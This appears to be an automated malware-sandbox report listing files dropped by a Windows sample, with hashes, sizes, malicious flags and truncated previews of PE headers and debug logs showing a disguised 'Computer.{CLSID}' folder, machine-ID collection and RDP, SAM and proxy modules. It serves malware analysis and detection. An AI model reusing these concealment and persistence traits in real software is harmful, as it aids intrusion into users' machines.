                  Encrypted:false
                  SSDEEP:12:yEMrEf+M/kVTDxr1xwJXl32fG1j6zslpM:HMW+WQ1HWdYGtbq
                  MD5:C2FE0BC924CA5ADDB87C8A90DAC6150C
                  SHA1:FCE7D45BDFCBDF8794AA542CE656A280266786C1
                  SHA-256:8B39BD151E99A197CF7F53DBF923AA78C6946887DB95FC4B3CEF8E238F1C60EC
                  SHA-512:74F9B21D87EA57CC05863D24FBACF7B3F4BF3712F622F7195DA9F91C26CD305361BDEA7B1876B918F0D690F81A4FE0FCF3B3FE207E7097E9BB015A2204EB3EA6
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.599560299028174
                  Encrypted:false
                  SSDEEP:12:7qU0kP/OuluTfPFXro8RB4soJaIRtJrffKpxya5KcWONPMqSAstuYBb2yjLqwxOG:OUJP/dyfRB4sokI7JbfeyaBdxIb27m
                  MD5:E1A7B4397B96265320D57AA70CB57A21
                  SHA1:DBD13B47ED717A58F45DDEBACC8133F0BB167426
                  SHA-256:D27AB76578EE2E23812DDCE17255CBBBD625840B294138308E364722BB3B6803
                  SHA-512:2FCD1F202F05C5D9168AEBA4A6522D0B07042661C649DED9BB83F9C5C4827A4E8433878F0CB6825B3192C8B007FA7560A04CD0E688864220DF8CA2537B601F97
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.55823785108821
                  Encrypted:false
                  SSDEEP:12:P/XEtPS+TEuvJI7W9SYYjNnlxMgfs4gwM08i1wsmxb18:H0tPS+TVuWwYYjNnlxlDMY1jmx2
                  MD5:62FA048D60A01E0146EE6E4B50D287D4
                  SHA1:76AB963105C3D8417796C3A98C076AEC4C3E6DF7
                  SHA-256:BA7941CF342F1D45B8B104C078AB82D61ED200D8937F5CBEA87B88264DAE78D7
                  SHA-512:C2E660E130A00EEB75E92598EA518E505ACB0598CD6C3A666AEA8E27F6CF1FE2C01C63C7FFDA79FE177341A691E8557F76C83CD6E41599E410A41E9D4FFBDC99
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.544849661689239
                  Encrypted:false
                  SSDEEP:12:NklLVPzjtvh+p7Yfe5ds8Mi1J1f1SklCA:NcLVfxo6fejN1SWCA
                  MD5:ED049C0A67254803FCF37AE416AA3E33
                  SHA1:FFA407AC48A97B3878F9512D265B8AC06DC509A2
                  SHA-256:992D78CD757880A032AF02AD5FCC6D631B64EDDAA5F8B01EDE60EAE29008A4AF
                  SHA-512:5273CCFA5D9F46F410D9DA0CA498A68AADE6DCFE4787396DE7CB2270DB7D0CEB018E7D74FE4A351B4EFCD4B82E311DF821626AFFF330978310884130D1949D17
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.553247310928163
                  Encrypted:false
                  SSDEEP:12:6OWSQv6dgA/jpemPEw2oo+jG414DlfQ4HZ5w1+fj9jD:KYdHrpemsovG4mhfvHjwsRjD
                  MD5:C6CF55E06E4FEA80F4434AEBD63612EF
                  SHA1:C018409C2F821A9C468CF98A24B4DE94D1D55F23
                  SHA-256:F7CC8E8CDD2B93940879E3606857CE3183E06E83B0DC3A7DA06ED5EE53DEA1A3
                  SHA-512:2FFB4D6E4FE1C4C7A44FC794014ED3FCFC2C648620445717F47040B52B6D1964CBE099E11E178D5800C1C79C314C63AB762567A879FB1242A046895116DEEAE0
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):7.624068592945783
                  Encrypted:false
                  SSDEEP:12:1GfPhlGgvYcPMQlOcuXCQ+qzUTS//ZJ77pjo9:1GHGrcPtUfUm/Rjo9
                  MD5:C606FBC54B285D4642B26C5C64BB2101
                  SHA1:07F629AC4782E929FB65D8BA40FF096C9A9AC42B
                  SHA-256:5079BFF4A5AF8F51CB1AF8CB263CEA9BBCE1BA600B780F716559ED0AEF262FBF
                  SHA-512:3840701493F07FA98EA1ADC49794F405EC36C093D79C2C6DE09A1C3B2B041EA27D3784F6213C50E5274980B71B5CE544858C37CE7E862333C10FFB513481653A
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):80
                  Entropy (8bit):6.037492001110315
                  Encrypted:false
                  SSDEEP:3:xVE+YLU4Q23PHp5xtU9RE/dP5:3tsBQSrfIEZ5
                  MD5:392741C71213C998A0DE150EADDAF2C2
                  SHA1:964F24D82EAD7C4F76138CE2D74DB5933DF68CE4
                  SHA-256:4856D55E42ED990BADCC65A1E629AD7617F9E461FD34D38E4963CACB565BA26F
                  SHA-512:FAF3A2CF93A1B69D32433C83C3F741EAA38324E4F9884E314395A12BDD3A008AD954399FF55C4CBBDE25A93ED47941EA1242D8FB1441D3B546CD854AD2B762EF
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):721
                  Entropy (8bit):6.670880900292129
                  Encrypted:false
                  SSDEEP:12:/kuIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCArTwk4yDkfIl:8PRlRlRlRlRlRlRlRlRlRj2yyHRydnJz
                  MD5:8B09EA9878A6420D1EADEA7904AC4EA5
                  SHA1:9834C062114D163B13538905F622BAD55A6014F6
                  SHA-256:8CC76835983C1A2F391F4BC4FDDFEBE9B4C868B2AE983C2C07B72AA02AF5FE2B
                  SHA-512:A5551618850E727C3D1BEA71297C5AD73363D54DCD508E7E5AD892FA9399707CD884B6347B83AFEEC41A6FCF2AC8EC9FB557F417A4FA78665620ACCDC7082D15
                  Malicious:false
                  Preview:.....An.~._!Jt.....[.s...3.....s.h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(..I..A.fkM.....?_....w.A.X[.QB...............0NR...........NTCP2.@.caps=.4;.s=,F4d0G90-htEBetk4DBpgNK0qR~e7~YM9x0m-Wd7vkAU=;.v=.2;..........SSU2.q.caps=.4;.i=,Tuv55otY-QEjSjfjF-BMHhqj3ZCdFYB3KA2tvlPO0rM=;.s=,Q1c8WvuOm~jxOzaOjECcC2Qatq0u6KT4wPaQ6io~-1I=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.60;+c!..&/..O.}..:..)y.6..A.....9..|pq...t.O(_........~..G.&#..
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):455
                  Entropy (8bit):6.1395387447907614
                  Encrypted:false
                  SSDEEP:12:/kuIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCPIHxCArTwk4yEqjQr:8PRlRlRlRlRlRlRlRlRlRj2yb+
                  MD5:97C6BB9B99A9E9E70EC9B2B807D4D117
                  SHA1:DE3D4E8E6E0F8AC5F594C1B8F7D2AC2B0935B76F
                  SHA-256:EEA0E2D55DD19FE7CD02CED80463823477DECB9B61AAF8C38AF8E1E23C69E259
                  SHA-512:2E805954E100496C02BDFF334C58DA4FFB7CF94E3E002B62F1F491AC5A96D1C608C65A663DE6BC83055BF216BA8D32E10AC94823C77E159BFEB937BCF174079E
                  Malicious:false
                  Preview:.....An.~._!Jt.....[.s...3.....s.h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(...h..FKu|..me.nY.f...:.&......(..I..A.fkM.....?_....w.A.X[.QB............j....lF.a.........j.;..7B..E~.....)..=.C....I.=0.T.BVkw/fz.
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):96
                  Entropy (8bit):6.314129167387828
                  Encrypted:false
                  SSDEEP:3:jft9surlY5mXXpfGdWViwIn2Wn:jl9rAmpPxIn2Wn
                  MD5:341B9BA4A056FD653CCF2AD78ABF854E
                  SHA1:034365159BA29815F85EAF83929ECCDB287109A9
                  SHA-256:F4D9CAA5F14B6FC218C0D77980C1F03BAFC57F87A93F92D3338AAD42DBDAC1F4
                  SHA-512:644DBF9735F672340482357AD7A0B71242E5188BCDE1A8335AA09A1EC5BFCD0398EBCBEEC2534EEB9CA6B112E3F526BD291D0D4C5A5546046621E1772D82A977
                  Malicious:false
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):9146880
                  Entropy (8bit):6.674868432808522
                  Encrypted:false
                  SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                  MD5:676064A5CC4729E609539F9C9BD9D427
                  SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                  SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                  SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Joe Sandbox View:
                  • Filename: file.exe, Detection: malicious, Browse
                  • Filename: file.exe, Detection: malicious, Browse
                  • Filename: file.exe, Detection: malicious, Browse
                  • Filename: file.exe, Detection: malicious, Browse
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................
                  Process:C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe
                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):89088
                  Entropy (8bit):6.205377670389132
                  Encrypted:false
                  SSDEEP:768:y5rUJUohYhdi9PbahfxaxQo9uYN/kpYBbMQGwryimzgvmak7EoKk1dhJJY9V/Sbf:digoZax39NN/DBgQVmzg5kF/ctIN
                  MD5:BB070CFBD23A7BC6F2A0F8F6D167D207
                  SHA1:BDB8961F8AFB999AECE60BF1EF3E49E8E2349F7B
                  SHA-256:C0860366021B6F6C624986B37B2B63D460DD78F657FC504E06F9B7ABBFDC2565
                  SHA-512:93D052675636FBE98204EF8521B9F10F8A0CBCAC40E8835AD8249DAFD833C29B7F915A898671B21064D4ED6D04DA556D9D3647D03EB93232ADB2ACD2D7DC1F8A
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*.....X.................@....................................-.....`... .................................................P............`..X............................................B..(....................................................text...X...........................`..`.data...............................@....rdata...Q.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):13511
                  Entropy (8bit):5.603686264960938
                  Encrypted:false
                  SSDEEP:192:AzOTi0dAQXh1d8yX7E0w86ocoX3wgox879FKZ+8u++faD8dBMGqa89nsUEg8HoOp:sOT2zEz5NvAbp+Kz/1B2X0rnC
                  MD5:E8524DE0DDB8DFAFF080F03A57FC5B67
                  SHA1:E0A34AAA587AD55C94C3250CDBEB115CDCDA3401
                  SHA-256:6DE9766FCAC93634F083E4CD1448C0D626958CDC381285C24B0C999545744567
                  SHA-512:916BCB51E7BB952C6981FA26E02532985376D99DEA325C26FD83BEA53933FA939163353463493B3E6FA948D657683C676121F75A7883EF4B4F26BE32FF267744
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg,buf_sz=10480965)..[I] (fs_path_expand) -> Done(path=%TEMP%,xpath=C:\Windows\TEMP,xpath_sz=15)..[I] (fs_path_temp) -> Done(path=C:\Windows\TEMP\PrnaubOU,path
                  Process:C:\Users\user\AppData\Local\Temp\j5ql5xzpbrfk9lvkq57d8xjw55zyt.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):456
                  Entropy (8bit):3.2341395630162877
                  Encrypted:false
                  SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
                  MD5:40AB00517F4227F2C3C334F1D16B65B4
                  SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
                  SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
                  SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
                  Malicious:false
                  Preview:C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):105984
                  Entropy (8bit):6.285421743969757
                  Encrypted:false
                  SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                  MD5:6E01ED70D02CE47F4D27762A9E949DEE
                  SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                  SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                  SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4989431
                  Entropy (8bit):5.005298546018559
                  Encrypted:false
                  SSDEEP:192:AONOTB0+55555555555o5555o5555555555555555555555555o555555555555y:NNOTF
                  MD5:78F5E6B53B87ABDBB87B5BE0B7473F24
                  SHA1:12B90FDFF40BC73A5D8B2C4C76C81C1A261102B4
                  SHA-256:623E470D5E7B9840FBC3DB796C5514BE4F06324BA311E967D0F02A5132546449
                  SHA-512:01A0A54616CFBBC4FACA034B99F92151DD98CBAA39EDD64AB1E4C817D859E358437F1967919B18C0A9436432F80CDEF1155453CDE391BD784FC0E6F324031328
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8ba50a8a0)..[I] (tcp_connect) -> Done(sock=0x388,host=7
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):129536
                  Entropy (8bit):6.2852879161990645
                  Encrypted:false
                  SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                  MD5:88E6178B0CD434C8D14710355E78E691
                  SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                  SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                  SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.<..........Y.........,...................................../*....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1062106
                  Entropy (8bit):5.3232281164513955
                  Encrypted:false
                  SSDEEP:192:A+NOT6PPPIPPPPIPPPPPPPPPPPPPPPPPPPPPPPPPPPPPIJJPPPPPPPJPIJdJPJIk:ZNOTA
                  MD5:449D3411E002AF4231CB160844F0CA3F
                  SHA1:91B941278699C6D5AEBBBA7B1A62B743510504D0
                  SHA-256:F171EC6418D9A9117071186E2D08F2B97C8B3B7D111E372E5CACF349E0D47EE6
                  SHA-512:E650F4C41B5E766D39D40782CA71C59385001D4AE15B8E049BC4A37CB0E7344C2E6011AB584F03CC6F99FC7809B9FE864288A06B2409347EF69EA5A810D8BC9C
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8b919
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):4
                  Entropy (8bit):2.0
                  Encrypted:false
                  SSDEEP:3:9:9
                  MD5:006F29D8E822B9241020AEC2495EF819
                  SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                  SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                  SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                  Malicious:false
                  Preview:wgNj
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):37376
                  Entropy (8bit):5.7181012847214445
                  Encrypted:false
                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):115712
                  Entropy (8bit):6.25860377459178
                  Encrypted:false
                  SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                  MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                  SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                  SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                  SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):3038844
                  Entropy (8bit):5.281771188349672
                  Encrypted:false
                  SSDEEP:192:ARNOTdvvvuvvvvuvvvvvvvvvvvvvvvvvvvvvvvvvvvvRRvvvvvvRuFRvRuvvvvvq:uNOTe
                  MD5:236BD9B611F1CB855E04C697830FE0B4
                  SHA1:338148E7158BCA129C495A728804AB1D90BB92B0
                  SHA-256:D5AD543BE783E25DF72CA9795DEB27B82081DE5DF1105B619F766BE24E09C489
                  SHA-512:50F8644B95D83521B97B2B69696D3984A9EEDF9A18127A3330487B487BB1C04CA966FF411A7AC965D51B14E7B21DE7CA9513E8095A9C98187D42A57216B0DAD1
                  Malicious:false
                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=bddd1a2f)..[I] (sys_init) -> Done(sys_uid=c76a8f08bddd1a2f,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8b915e342)..[I] (tcp_connect) -
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):91136
                  Entropy (8bit):6.2041507656664825
                  Encrypted:false
                  SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                  MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                  SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                  SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                  SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
